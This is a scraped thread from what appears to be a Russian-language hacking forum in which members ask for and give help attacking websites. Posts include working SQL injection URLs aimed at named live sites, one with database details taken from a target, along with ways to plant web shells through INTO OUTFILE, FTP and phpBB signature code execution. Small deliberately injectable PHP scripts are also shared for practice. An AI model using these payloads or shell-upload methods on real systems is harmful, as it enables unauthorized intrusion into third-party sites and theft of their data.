Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274

    Ваши вопросы по уязвимостям. Где ты узрел слова- помощь в раскрутке скулей?
     
    1 person likes this.
  2. freezed

    freezed Member

    Joined:
    27 Aug 2010
    Messages:
    154
    Likes Received:
    22
    Reputations:
    7
    http://194.28.132.13/index.php?option=com_aardvertiser&task=view&cat_name=Equipment'+and+1=0+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20%23
     
  3. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    Кто-нибудь заливал шелл в форуме wowbb через админку?
    Есть возможность restore bd
    и выполнить sql команды!

    у кого есть опыт можете подсказать?
     
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    ну попробуй залить через sql команду. если есть права
     
    _________________________
  5. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,027
    Likes Received:
    311
    Reputations:
    86
    Чета не догнал я, как тут крутить, казалось бы, SQLi с выводом ошибок.
    http://injoyv[GOOGLE fuck]ideos.com/product.php?proid=85'
    Делал GROUP+BY'ем, ну выдавил, что 3 колонки, оно не подошло, ладно, думаю, пофиг, стал нянчить SELECT'ом и вот до чего дошел:
    Code:
    UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56
    При этом значении выдает не несоответствие числа колонок, а другое:
    Причем при подстановке +--+ в конец ситуация меняется.

    Че это и как быть дальше???
     
    _________________________
    #15625 fl00der, 15 Dec 2010
    Last edited: 15 Dec 2010
    3 people like this.
  6. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    дело в том что просто знаний не хватает)))

    хотел по примеру залить как на phpbb

    Code:
    UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=2;
    но не могу понять
    вот это
    Code:
    user_sig_bbcode_uid='(.+)/e\0'
     
  7. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    колонок 3 как ты и сказал...но вывода нет..
    а кто сказал что должен быть вывод? крути как слепую..

    version: 4.1.20
    user: injoyuser@localhost
    database:injoydb


    табла admin, user есть..дальше сам..и впредь убирай ядовитые цвета из постов..глаза болят..
     
    #15627 Gorev, 15 Dec 2010
    Last edited: 15 Dec 2010
    2 people like this.
  8. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    http://injoyvideos.com/product.php?proid=-85%20or%201%20group%20by%20concat((select%20version()),floor(rand(0)*2))%20having%20min(0)%20or%201%20--%201

    Надеюсь ты знаешь, где именно пробелы убрать? ;)
     
    #15628 Фараон, 15 Dec 2010
    Last edited: 15 Dec 2010
    3 people like this.
  9. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    исполнение кода
     
  10. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    http://www.wowbb.com/admin_demo/admin.php?advanced=3

    вот в такой админке можно как то залить или нет?
     
  11. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    Пытаюсь залить шелл через into outfile, файл в директории создается, он он пустой
    пробывал поразному
    select '123' into outfile '/a/a.txt'
    и через terminated by, результат все тотже - файл заливается но он пустой.

    есть идеи в чем может быть проблема?
     
  12. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    попробуй в другую диру и
    Code:
    select 0x31 into outfile '/web/www/1.txt';
    
     
    1 person likes this.
  13. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    пробывал конечно.. все также.
     
  14. ALIM

    ALIM Member

    Joined:
    20 Apr 2010
    Messages:
    60
    Likes Received:
    6
    Reputations:
    5
    kongi tnx
     
    #15634 ALIM, 15 Dec 2010
    Last edited: 16 Dec 2010
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    ALIM

    это хеш а не плавный пасс..
     
    _________________________
  16. Sc0rpi0n

    Sc0rpi0n Banned

    Joined:
    23 Feb 2010
    Messages:
    75
    Likes Received:
    22
    Reputations:
    16
    Здравствуйте. Дайте пожалуйсто пример исходного кода скрипта, где есть традиционая блинд sql инъекция. Если нет, тонаьросате пожалуйсто. Надо обучиться в дом.условиях
     
  17. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    PHP:
    <?php
    $connect 
    mysql_connect ('localhost','root','') or die (mysql_errno().':'.mysql_error());
    $query mysql_query ("SELECT * FROM `test`.`practice` WHERE id = ' ".$_GET['id']." ' ") or die (mysql_errno().':'.mysql_error());
    if(
    $row mysql_fetch_array($query))
       echo 
    'TRUE';
    else
       echo 
    'FALSE';
    ?>
     
    #15637 h00lyshit!, 16 Dec 2010
    Last edited: 28 Feb 2011
  18. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    PHP:
    <?
    /*
    CREATE DATABASE `test` ;

    CREATE TABLE `test`.`news` (
    `news_id` INT NOT NULL AUTO_INCREMENT PRIMARY KEY ,
    `title` VARCHAR( 255 ) NOT NULL ,
    `content` TEXT NOT NULL
    ) ENGINE = MYISAM ;

    INSERT INTO `test`.`news` (`news_id` ,`title` ,`content`) VALUES ( NULL , 'title1', 'content1 content1 content1 content1 content1' );
    INSERT INTO `test`.`news` ( `news_id` , `title` , `content` ) VALUES ( NULL , 'title2', 'content2 content2 content2 content2 content2');

    */

    mysql_connect('localhost','root','');
    mysql_select_db('test');

    $res=mysql_query('select * from news where news_id ='.$_GET[id]);
    if (
    $res) {echo "ok!";} else {echo "error!";}

    ?>
     
    3 people like this.
  19. ALIM

    ALIM Member

    Joined:
    20 Apr 2010
    Messages:
    60
    Likes Received:
    6
    Reputations:
    5
    захожу на сайт:
    ftp://xxxxxxxxxx.se
    там 2 файла:
    .bashrc
    .bash_profile
    в которых ничего особенного нет, выше не поднимается, других файлов и папок нет
    создаю папку с правами 777, шелл заливается
    ftp://xxxxxxxxxx.se/1/test.php не выполняется открывается как текстовый файл
    http://xxxxxxxxx.se/1/test.php
    нет такого файла
    Есть ли тут возможность заливки шелла?
     
    #15639 ALIM, 16 Dec 2010
    Last edited: 16 Dec 2010
  20. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    На сайте есть скуль, через order by смотрю сколько полей их 3!
    Через union+select подставляю 1,2,3--
    выдает такой вот текст:

    Query failed: The used SELECT statements have a different number of columns

    как такое может быть и как это обойти?
     
Thread Status:
Not open for further replies.